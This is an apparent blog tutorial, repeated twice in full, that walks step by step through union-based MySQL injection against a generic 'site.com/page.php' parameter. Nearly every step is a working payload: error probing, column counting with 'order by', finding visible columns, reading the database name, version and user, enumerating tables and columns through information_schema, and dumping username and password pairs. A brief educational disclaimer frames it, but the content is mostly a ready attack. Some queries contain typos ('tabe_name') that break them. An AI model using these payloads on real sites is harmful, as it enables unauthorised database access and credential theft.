UNION BASED MYSQL INJECTION ---
This blog is only educational purpose. please do not use the skills gained from this blog to harm or attack or even test otherwise/sites/etc to which you do not have the permission.it is illegal to do so.if you get caught & mind you (you would) then don't say that you did not know. you have been specially warned.
Step 1: find a dynamic page
site.com/page.php?x=y
Step 2: apply ' to check if website is vulnerable or not
site.com/page.php?xid=76'
now the websiite must give you some signs of error like:
SQL error, php error, custom error, page not found, page redirect, blank page, data missing from page, etc
Step 3: Confirm if website is vulnerabke and find the injection type
(string / integer) by applying --+
site.com/page.php?xid=76'--+
if no error then injection type is string else try removing '
site.com/page.php?xid=76--+
now normal page should open and it means injection type is integer, if still it dosent try another link
NOTE* if injection type is string
site.com/page.php?xid=76' [sql injection here]--+
if injection type is integer
site.com/page.php?xid=76 [sql injection here]--+
Step 4: get the number of columns in current query using order by (assuming injection type string)
site.com/page.php?xid=76' order by 1--+ no error
site.com/page.php?xid=76' order by 2--+ no error
site.com/page.php?xid=76' order by 3--+ no error
.
.
site.com/page.php?xid=76' order by n--+ error
this means number of columns=n-1
Step 5: find the visibble/vulnerable columns (assuming no of columns=4)
site.com/page.php?xid=76' union select 1,2,3,4--+
now you must see some or all of these numbers (the number that are visible are vulnerable and can be used to get more info)
NOTE* if you dont see any numbers try putting a - sign
site.com/page.php?xid=-76' union select 1,2,3,4--+
if still no numbers then try another type of injection
Step 6: get the name of the database, version and mysql user (assuming column 2 and 3 are visible)
site.com/page.php?xid=76' union select 1,concat_ws(0x3a3a,database(),version(),user()),3,4--+
Step 7: get the names of the tables (assuming database name is xyz)
site.com/page.php?xid=76' union select 1,table_name,3,4 from information_schema.tables where table_schema='xyz' --+
note* if you only get a single row use group_concat(table_name) instead of table_name
Step 8: get the names of columns (assuming table name is users)
site.com/page.php?xid=76' union select 1,column_name,3,4 from information_schema.columns where table_schema='xyz' and tabe_name='users'--+
Step 9: get the data (assuming column name is user_name and user_pass)
site.com/page.php?xid=76' union select 1,group_concat(user_name,0x3a3a,user_pass),3,4 from xyz.users--+
Step 10: evil smile 3:)
This blog is only educational purpose. please do not use the skills gained from this blog to harm or attack or even test otherwise/sites/etc to which you do not have the permission.it is illegal to do so.if you get caught & mind you (you would) then don't say that you did not know. you have been specially warned.
Step 1: find a dynamic page
site.com/page.php?x=y
Step 2: apply ' to check if website is vulnerable or not
site.com/page.php?xid=76'
now the websiite must give you some signs of error like:
SQL error, php error, custom error, page not found, page redirect, blank page, data missing from page, etc
Step 3: Confirm if website is vulnerabke and find the injection type
(string / integer) by applying --+
site.com/page.php?xid=76'--+
if no error then injection type is string else try removing '
site.com/page.php?xid=76--+
now normal page should open and it means injection type is integer, if still it dosent try another link
NOTE* if injection type is string
site.com/page.php?xid=76' [sql injection here]--+
if injection type is integer
site.com/page.php?xid=76 [sql injection here]--+
Step 4: get the number of columns in current query using order by (assuming injection type string)
site.com/page.php?xid=76' order by 1--+ no error
site.com/page.php?xid=76' order by 2--+ no error
site.com/page.php?xid=76' order by 3--+ no error
.
.
site.com/page.php?xid=76' order by n--+ error
this means number of columns=n-1
Step 5: find the visibble/vulnerable columns (assuming no of columns=4)
site.com/page.php?xid=76' union select 1,2,3,4--+
now you must see some or all of these numbers (the number that are visible are vulnerable and can be used to get more info)
NOTE* if you dont see any numbers try putting a - sign
site.com/page.php?xid=-76' union select 1,2,3,4--+
if still no numbers then try another type of injection
Step 6: get the name of the database, version and mysql user (assuming column 2 and 3 are visible)
site.com/page.php?xid=76' union select 1,concat_ws(0x3a3a,database(),version(),user()),3,4--+
Step 7: get the names of the tables (assuming database name is xyz)
site.com/page.php?xid=76' union select 1,table_name,3,4 from information_schema.tables where table_schema='xyz' --+
note* if you only get a single row use group_concat(table_name) instead of table_name
Step 8: get the names of columns (assuming table name is users)
site.com/page.php?xid=76' union select 1,column_name,3,4 from information_schema.columns where table_schema='xyz' and tabe_name='users'--+
Step 9: get the data (assuming column name is user_name and user_pass)
site.com/page.php?xid=76' union select 1,group_concat(user_name,0x3a3a,user_pass),3,4 from xyz.users--+
Step 10: evil smile 3:)